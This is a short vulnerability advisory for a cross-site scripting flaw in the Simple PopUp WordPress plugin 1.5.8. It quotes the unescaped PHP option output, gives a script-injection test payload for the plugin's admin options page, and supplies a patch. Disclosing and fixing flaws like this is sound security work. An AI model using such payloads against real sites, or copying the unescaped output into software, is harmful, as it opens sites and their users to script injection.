Wordpress 1.5.8 Simple PopUp Plugin Cross Site Scripting

2015-08-19
ID: 81232
CVE: None
Download vulnerable application: None
######################
# Exploit Title : Wordpress Simple PopUp Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/simple-popup/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link : https://downloads.wordpress.org/plugin/simple-popup.zip
# Version : 1.5.8
######################
# Vulnerable File :
sp-options.php (WordPress SimplePop Options)

######################
# Vulnerable Codes :
19:        register_setting( 'sp-settings-group', 'popup_box_delay' );
22:        register_setting( 'sp-settings-group', 'popup_box_rounded_corner');
48: <input type="text" name="popup_box_delay" value="<?php echo
htmlspecialchars(get_option('popup_box_delay')); ?>" />
72:        <input type="text" name="popup_box_rounded_corner" value="<?php
echo get_option('popup_box_rounded_corner'); ?>" />

######################
# Exploit :
For test Cross site scripting can use this code in all of the above inputs.
Address WordPress SimplePop Options :
http://localhost/wordpress/wp-admin/admin.php?page=simple-popup%2Fsp-options.php
"><script>alert(/xss/)</script>

######################
# Patch:
To fix this vulnerability you use htmlspecialchars() function .
48: <input type="text" name="popup_box_delay" value="<?php echo
htmlspecialchars(get_option('popup_box_delay')); ?>" />
72:        <input type="text" name="popup_box_rounded_corner" value="<?php
echo htmlspecialchars(get_option('popup_box_rounded_corner')); ?>" />

######################
# Discovered By : Ehsan Hosseini.
######################
1-4-2 (www02)